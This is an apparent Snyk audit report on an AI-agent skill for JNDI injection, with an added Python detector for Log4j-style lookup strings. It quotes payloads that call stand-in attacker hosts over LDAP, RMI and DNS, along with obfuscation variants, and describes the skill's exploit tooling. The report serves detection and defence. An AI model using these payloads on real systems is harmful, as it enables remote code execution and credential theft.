jndi-injection
Fail
Audited by Snyk on Apr 9, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This document is an explicit offensive playbook that instructs how to perform JNDI injection for remote code execution, run rogue RMI/LDAP servers, exfiltrate secrets (including environment variables and AWS keys), use deserialization gadget chains, and evade WAFs; that is, it provides step-by-step malicious techniques and tooling for system compromise and credential theft.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs creating and interpreting JNDI lookups to attacker-controlled public endpoints (e.g., ${jndi:ldap://ATTACKER:1389/Exploit}, ${jndi:dns://TOKEN.collab.net}) and using tools/servers (marshalsec, RogueJndi), so the agent is expected to ingest and act on untrusted third-party responses from open internet hosts, including DNS/LDAP/RMI payload results (see sections 3, 4, 5, and 7 of SKILL.md).
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs runtime use of attacker-controlled lookups such as ldap://attacker.com:1389 and http://attacker.com/Exploit.class, which cause a JVM to fetch remote class or serialized data and execute it. External URLs are therefore required at runtime and directly enable remote code execution.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt is an explicit offensive playbook that tells the agent to run exploit tooling and start LDAP/RMI/JRMP listeners and payloads (marshalsec, ysoserial, RogueJndi, etc.). Doing so would execute code, change the agent host's state, and enable remote code execution, so it should be flagged.
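The following is an added example, not Snyk's detector and not code from the audited skill. It shows the kind of pattern check that findings such as E006 and W012 rely on: it recognises JNDI lookup strings of the form quoted in this report (${jndi:ldap://ATTACKER:1389/Exploit}, ${jndi:dns://TOKEN.collab.net}) and also the well-known Log4j obfuscations that hide the word "jndi" behind ${lower:j}, ${upper:N} or single-character default-value lookups such as ${::-j}. The sample lines are constructed for the example; the normalisation rounds and the treatment of only single-character defaults are assumptions of this example, chosen so that ordinary configuration lookups like ${env:HOME} are not flagged.

```python
import re

# Constructed sample input resembling lines a skill document or log might contain.
SAMPLE_LINES = [
    "Send the header: User-Agent: ${jndi:ldap://ATTACKER:1389/Exploit}",
    "Out-of-band check: ${jndi:dns://TOKEN.collab.net}",
    "Obfuscated: ${${lower:j}ndi:${lower:l}dap://attacker.com:1389/a}",
    "Default-value trick: ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.com:1099/x}",
    "Benign: the config key ${env:HOME}/logs is expanded at startup",
    "Benign mention of the word jndi in prose is not a lookup",
]

# A resolved JNDI lookup: "${jndi:" followed by the URL scheme (ldap, rmi, dns, ...).
LOOKUP_RE = re.compile(r"\$\{jndi:([a-z]+):")

# Obfuscation forms that evaluate to a single character before the jndi lookup runs:
#   ${lower:j} / ${upper:N}  -> case-conversion lookups on one character
#   ${::-j} / ${env:NaN:-j}   -> default-value syntax where the default is one character
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}])\}")


def normalize(text: str, max_rounds: int = 8) -> str:
    """Collapse nested single-character lookups so that obfuscated payloads
    reduce to their plain form, then lowercase for case-insensitive matching.
    max_rounds bounds the work on pathological input (an assumption of this example)."""
    for _ in range(max_rounds):
        new = _CASE_RE.sub(lambda m: m.group(1), text)
        new = _DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def find_jndi_lookups(text: str) -> list:
    """Return the URL schemes of every JNDI lookup found in text after normalisation."""
    return [m.group(1) for m in LOOKUP_RE.finditer(normalize(text))]


def scan_lines(lines) -> list:
    """Scan lines of a document; return (1-based line number, scheme, original line)
    for each JNDI lookup found. Benign lookups such as ${env:HOME} are not reported."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for scheme in find_jndi_lookups(line):
            findings.append((number, scheme, line))
    return findings


if __name__ == "__main__":
    for number, scheme, line in scan_lines(SAMPLE_LINES):
        print(f"line {number}: jndi lookup via {scheme}: {line}")
```

In a real audit the scheme matters for triage: ldap, ldaps, rmi and iiop lookups can make the JVM fetch and execute remote classes or serialized objects (the W012 concern), while a dns lookup on its own is an out-of-band callback used to confirm injection or exfiltrate data (the W011 concern).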
Issues (4)
E006 - CRITICAL: Malicious code pattern detected in skill scripts.
W011 - MEDIUM: Third-party content exposure detected (indirect prompt injection risk).
W012 - MEDIUM: Unverifiable external dependency detected (runtime URL that controls agent).
W013 - MEDIUM: Attempt to modify system services in skill instructions.
Audit Metadata